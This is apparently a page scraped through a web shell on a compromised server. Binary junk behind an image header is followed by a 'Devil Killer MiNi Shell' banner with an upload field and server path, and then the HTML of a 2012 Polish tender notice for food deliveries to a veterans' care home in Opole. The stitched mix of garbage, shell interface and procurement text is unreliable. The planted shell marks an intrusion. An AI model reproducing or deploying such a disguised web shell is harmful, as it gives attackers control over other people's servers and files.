JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120209/39338-N-2012.html

<p class="kh_header"><b>Opole: Sukcesywna dostawa  artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole.</b><br>
<b>Numer ogłoszenia: 39338 - 2012; data zamieszczenia: 09.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu , ul. Chmielowicka 6, 45-738 Opole, woj. opolskie, tel. 0-77 4743697, 457 54 95, faks 0-77 4743697, 457 54 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa  artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych różnych o Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole, w ilości i asortymencie wyszczególnionym  w niniejszej specyfikacji istotnych warunków zamówienia                 w pkt. 2 od poz 1 do poz.98. tj. 
poz.1	Barszcz czerwony  instant - w opakowaniu szklanym (słoiczek)   ilość   szt 10, poz.2 Biszkopty z galaretka owocową w polewie 135g typu Andante    ilość  szt 50,poz.3. Budyń bez cukru różne smaki 1 kg	  ilość 	szt  36,poz.4 bułka tarta 0,5 kg klasa  I	ilość   szt  400,poz.5. Chrzan tarty konserwowy 0,18 kg	 ilość szt	  300, poz6. Ciastka kruche z cukrem lub marmoladą 150-200g	 ilość  szt. 50, poz.7  Ciastka markizy 150 g różne smaki	 ilość   	szt. 50, poz. 8  Ciastka wafelki  różne smaki 450 g szt. 30, poz 9	Cukier biały 1,00 kg ilość 	szt. 2050,poz. 10	Cukier puder 0,50 kg ilość szt  10, poz.11 Cukier waniliowy 0,032 kg  ilość 	szt. 550, poz. 12	Cukierki czekoladowe miękkie o różnych smakach	 ilość kg 20,00, poz. 13	Cynamon mielony 0,02 kg ilość szt. 80, poz.
14	Czekolada mleczna lub gorzka  100g	 ilość 	szt.180, poz.15	Czekoladki Mikołajki 20-30g  ilość szt. 138, poz.16	Czosnek granulowany 0,02 kg ilość szt. 250 , poz. 17	Dżem mały różne smaki- 195 g bez cukru słodzony asparanem  ilość 	szt. 900,poz.18	Dżem mały z cukrem  różne smaki nisko słodzony- 0,025 kg ilość 	szt. 2700,poz.19	Dżem z cukrem 280g niskosłodzony   ilość 	szt . 850,poz.20	Fasola Jaś  - duży, suchy opakowanie foliowe 0,50 kg ilość  szt. 280, poz.21	Gałka muszkatołowa 0,015 kg (cała/mielona)  ilość 	szt. 20, poz. 22	Groch żółty suchy łuskany połówki opakowanie foliowe 0,50 kg ilość 	szt. 160, poz.23	Groszek konserwowy 0,40 kg	ilość     	szt. 120, poz.24	Grzyby suszone (podgrzybek)  0,02 kg	ilość  szt	. 20, poz.25	Herbata granulowana czarna- 0,10 kg 	ilość  szt. 1100, poz.26	Herbata ekspresowa czarna-20szt		ilość  szt	 20, poz.27	Herbata rozpuszczalna smakowa - napój 0,10 kg ilość szt	40,poz.28	Kakao naturalne 0,20 kg	  ilość 	szt. 32,poz.29	Kasza jęczmienna 1,00 kg	 ilość 	szt. 300,poz.30	Kasza kukurydziana 0,40 kg ilość 	szt. 270, poz.31	Kasza gryczana1kg	ilość  szt. 110, poz.32	Kutia0,5kg- (kasza)	ilość szt	 12,poz.33	Kasza manna w kg	ilość  360, poz.34	Kawa naturalna mielona 500g ekstra ilość 	szt. 20, poz.35	Kawa rozpuszczalna naturalna - 0,20 kg 	ilość  szt. 16,poz.36	kawa zbożowa 0,50 kg	ilość szt.	340,poz.37	ketchup łagodny 0,50 kg- (37% koncentratu)  ilość 	szt  400,poz.38	Kleik ryżowy błyskawiczny- 0,20 kg      ilość szt. 150,  poz.39	Kminek ,cały 0,015 kg	ilość szt .30, poz.40	Koncentrat barszczu czerwonego w płynie 0,300 l min 25%	 ilość  szt. 150, poz.41	Koncentrat pomidorowy 30% 0,9 l  ilość 	szt. 200,poz.42	Konserwa rybna makrela w oleju 170 g 	  ilość 	szt 230, poz.
43	Konserwa rybna makrela w pomidorach 170 g	ilość szt	. 230,poz.44	Koper suszony 0,01kg	 ilość  szt  100, poz.45	Kukurydza konserwowa 0,40 kg	ilość 	szt. 60, poz.46	Kwasek cytrynowy 0,02 kg	ilość 	szt. 80, poz. 47	Liście laurowe 0,012 kg		ilość  szt. 100, poz.48	Majeranek 0,02		ilość . szt 280, poz.49	Majonez dekoracyjny 0,70 l - (zawartość olej rzepakowy, żółtka jaj 6%, musztarda, ocet, i przyprawy)		 ilość  szt. 120,poz.50	Makaron domowy 5 jajeczny nitka- cięta drobno do rosołu  250g 	ilość szt	 780, poz.51	Makaron z mąki durum - 0,50 kg(świderek, drobne muszelka, kolanko)      ilość szt. 720, poz.52	Makaron zacierkowy 5 jajeczny 0,250kg lub literki 0,25kg, łazanki	ilość szt	. 1100, poz.53	Marmolada wieloowocowa twarda 1 kg	ilość szt	 40, poz.54	Marynata ziołowa  do mięsa i drobiu  0,02 kg ilość 	szt. 110,poz.55	Masa makowa puszka 1 kg	ilość szt. 10, poz.56	Mąka pszenna tortowa typ 450 1,00 kg	ilość  szt	 890, poz.57	Mąka ziemniaczana  1,00 kg   ilość 	szt  200, poz.58	Migdały 0,08 kg lub 0,10kg    ilość 	szt 12, poz.59	Miód  naturalny 0,025 kg	      ilość 	szt. 2000, poz.60	Miód 1300 g-słoik	     ilość           szt	. 2, poz.61	Musztarda - 0,90 l słoik	  ilość 	szt 220, poz.62	Ocet spirytusowy 0,50 l butelka   ilość szt. 	160, poz.63	Olej rzepakowy typu  Kujawski z I-ego tłoczenia rafinowany rzepakowy100%-  1,00 l lub równoważny 	100%olej rzepakowy rafinowany z pierwszego tłoczenia.	ilość szt	 600, poz.64	Orzech włoski 100 g	ilość szt. 20,poz.65	Paluszki solone 100g	ilość  szt. 30, poz.66	Papryka mielona ostra 0,02 kg	ilość  szt. 70, poz.67	Papryka mielona słodka 0,02 kg	ilość  	szt. 350, poz.68	pasztet drobiowy 0,110kg- foremka  ilość 	szt. 350, poz.69	Pieprz czarny mielony 0,02kg	ilość  	szt 480,poz.70	Pieprz ziołowy   0,02 kg	    ilość 	szt 220, poz.71	Płatki owsiane 0,50 kg ekstra   ilość szt . 200, poz.72	Proszek do pieczenia 0,03 kg	ilość  szt. 40, poz.73	Przyprawa sucha do mięsa i drobiu 0,075 kg typu -Delikat bez glutaminianu sodu	ilość szt	300,poz.74	Przyprawa w płynie  do potraw-  0,90 l	 ilość  szt. 180, poz.75	Przyprawa warzywna do zup sucha -200g typu- wegeta  bez glutaminianu sodu ilość 	szt 380, poz.76	Rodzynki  sułtańskie 0,10 kg	 ilość   szt. 120, poz.77	Ryż długo ziarnisty biały-  1,00 kg	 ilość 	szt. 500, poz.78	Słodzik 1200 tabletek	  ilość 	szt. 30,poz.79	Sok z cukrem  malinowym 0,420 l - 0,50l	  ilość 	szt 380,poz.80	Sok pomarańczowy -1l (100%)	 ilość 	szt   20, poz.81	Sok jabłkowy-1l (100%)		 ilość  szt. 20, poz.82	Sok jabłkowy - 0,2 l (100%)	ilość  szt 50, poz.83	Sos chrzanowy 0,25 kg słoik	 ilość szt 330,poz.84	Sos czosnkowy 0,25 kg słoik	ilość  szt	 180, poz.85	Sos do pieczeni  ciemny 0,03 kg 	ilość  szt	 250, poz.86	Sos tatarski 0,25 kg słoik		ilość  szt	 80, poz.87	Sól kuchenna jodowana kg	ilość szt	 450, poz.88	Suchary bez cukru 0,280 kg	ilość  szt	. 200, poz.89	Suszona gruszka 	  ilość 	kg  2,00, poz.90	Suszone  jabłko	  ilość  	kg. 3,00, poz.91	Szczaw konserwowy 0,30 kg słoik	 ilość szt	. 180, poz.92	Szyneczka delikatesowa wieprzowa 0,110 kg- foremka ilość 	szt  1300, poz.93	Śliwki suszone bez pestki kalifornijskie ilość 	kg. 2,00, poz.94	woda mineralna gazowana 1,5 l	ilość  szt  1430, poz.95	woda mineralna niegazowana 1,5 l  ilość  szt. 3600, poz.96	Ziele angielskie 0,015 kg		ilość  szt	   120, poz.97	Żelatyna spożywcza- 0,05 kg	ilość  szt	 280, poz.98	Żurek   350 g		ilość szt	 200

Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole, w ilości i asortymencie wskazanym w opisie przedmiotu zamówienia zawartym  w   formularzu rzeczowo -cenowym  stanowiącym  załącznik do niniejszej specyfikacji istotnych warunków zamówienia. 
Przedmiot zamówienia będzie zamawiany partiami, które w treści umowy określane są jako jednorazowe zamówienie, w zależności od aktualnych potrzeb zamawiającego.
Wielkość jednorazowego zamówienia zostanie każdorazowo uzgodniona telefoniczne lub poprzez pisemne zgłoszenie w terminie do 2 dni przed odbiorem licząc od chwili zgłoszenia faksem  od zamawiającego lub według ustalonego harmonogramu, a w sytuacjach szczególnych, na żądanie zamawiającego, także poza tymi dniami.
Odbiór towaru w magazynie zamawiającego- od poniedziałku do piątku w godz. 7:30 - 14:30.

Dostawa przedmiotu zamówienia dokonywana będzie sukcesywnie partiami  średnio raz w tygodniu, w dniu roboczym. Wykonawca zamówiony towar będzie dostarczał do siedziby Zamawiającego własnym transportem zgodnie z wymogami określonymi w Ustawie z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. nr 171 poz. 1225) wraz z odpowiednimi aktami wykonawczymi. 
Termin przydatności do spożycia, od daty dostawy do Domu Pomocy Społecznej dla Kombatantów w Opolu będzie wynosił minimum dwie trzecie  gwarantowanego przez producenta terminu ważności.

Zamawiający wymaga aby wszystkie dostarczane artykuły spożywcze  posiadały nienaruszone fabryczne jednostkowe opakowanie, oraz  odpowiednie atesty, HDI (handlowe dokumenty identyfikacyjne). 

W przypadku niezgodności dostawy z zamówieniem, zamawiający ma prawo zgłoszenia
reklamacji telefonicznie, a wykonawca zobowiązany jest do natychmiastowej jej wymiany na towar o cechach organoleptycznych poszczególnych asortymentów  zgodnie z ustawą z 25 sierpnia 2006 r o bezpieczeństwie żywności i żywienia.
Przez cechy organoleptyczne przedmiotu zamówienia rozumie się zespół cech obejmujących smak, zapach, wygląd, w tym barwę i konsystencję środków spożywczych, które można wyodrębnić i ocenić za pomocą zmysłów człowieka.												
Zamawiający zastrzega, że wielkość przedmiotu zamówienia oraz wartość umowy może ulec zmniejszeniu, stosownie do faktycznych wielkości dostaw, przy zachowaniu cen podanych w ofercie  bez prawa roszczeń z tego tytułu przez Wykonawcę. 
Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie. Wykonawca będzie realizował dostawy (zamówienie) po  stałych cenach jednostkowych zawartych w ofercie. Zamawiający  dopuszcza w sytuacji zmiany wielkości opakowania przez producenta  możliwość przeliczenia ceny jednostkowej   na jednostkę  miary..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4, 15.40.00.00-2, 15.83.00.00-5, 15.87.00.00-7, 15.85.00.00-1, 15.98.10.00-8, 15.32.10.00-7, 15.84.20.00-2, 15.86.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach o których mowa w art. 22 ust.1 pkt 1 ustawy Pzp. Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie z wzorem ( propozycją) oświadczenia stanowiącym załącznik do specyfikacji Istotnych Warunków Zamówienia ( SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy składając ofertę muszą spełnić ( w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączna wiedza i doświadczenie) warunek posiadania wiedzy i doświadczenia, polegający na wykazaniu się w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy- w tym okresie, należycie wykonanymi minimum jednej dostawy ( dostawa realizowana na podstawie jednej umowy) odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, tj. sukcesywne dostawy artykułów spożywczych różnych na kwotę co najmniej 60 000 zł brutto z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że dostawy zostały wykonane należycie lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa w art.22 ust.1 pkt 3 ustawy Pzp. zamawiający żąda oświadczenia o braku podstaw do wykluczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa w art.22 ust.1 pkt 3 ustawy Pzp. zamawiający żąda oświadczenia o braku podstaw do wykluczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa w art.22 ust.1 pkt 4 ustawy Pzp. zamawiający żąda oświadczenia o braku podstaw do wykluczenia. Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z 	postępowania, zgodnie ze wzorem (propozycją ) oświadczenia  stanowiącym załącznik  do 	niniejszej SIWZ.
	
Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli:			
* z oświadczeń wykonawcy wynika, że:									
+  wykonawca spełnia warunki określone w art. 22 ust. 1 Ustawy Pzp,
+ wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego z
powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 Ustawy PZP.		

* dokumenty potwierdzają, brak podstaw do wykluczenia w oparciu o art. 24 ust. 1 Ustawy 	PZP    

* nie ujawni się żadna z przesłanek wykluczenia wykonawcy określona w art. 24 ust. 2 	ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Formularz oferty wypełniony i podpisany przez wykonawcę.
	2.Formularz  rzeczowo cenowy wypełniony i podpisany przez wykonawcę.
	3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z 	przepisów prawa lub innych dokumentów rejestrowych ( upoważnienie ,  pełnomocnictwo).</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień z art. 144 ust.1 Ustawy Prawo zamówień Publicznych. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić  od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. Dopuszcza się zastosowanie innej stawki i wysokości należnego podatku VAT w przypadku zmiany obowiązujących w tym zakresie przepisów.
Poza przypadkiem o którym mowa wyżej stronom przysługuje prawo odstąpienia od umowy w następujących sytuacjach: 												
1.Zamawiającemu  przysługuje prawo odstąpienia od umowy, gdy
		a)  zostanie ogłoszona upadłość Wykonawcy, zostanie wszczęta procedura 			likwidacji Wykonawcy lub Wykonawca zakończy prowadzenie działalności 
		b) w przypadku wszczęcia  postępowania egzekucyjnego, skierowanego do 			majątku Wykonawcy,
		c) Wykonawca nie rozpoczął realizacji przedmiotu umowy bez uzasadnionych 			przyczyn, oraz  nie kontynuuje jej mimo pisemnego wezwania Zamawiającego.
		d) w razie dostarczenia przez Wykonawcę asortymentu o parametrach  				niezgodnych z wymaganiami  określonymi  przez Zamawiającego w SIWZ  w 			szczególności  opisanych w formularzy rzeczowo - cenowym , lub w przypadku 		niedokonania przez Wykonawcę wymiany asortymentu , dostarczanego 				niezgodnie z z wymaganiami Zamawiającego   w terminie. trzech  godzin  			liczonych  od przyjęcia reklamacji przez Wykonawcę .
		e) w razie dostarczenia asortymentu pochodzącego od innego producenta - 			niedeklarowanego w Ofercie przez Wykonawcę.
2.W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym,  czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiające może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu  wykonania części umowy.
3.Odstąpienie od umowy może nastąpić wyłącznie w formie pisemnej pod rygorem nieważności .
4.Wykonawcy przysługuje prawo odstąpienia od umowy, jeżeli:  Zamawiający nie wywiązuje się z obowiązku zapłaty faktur w terminie 4 tygodni od dnia, w którym upłynął termin zapłaty określony w  umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
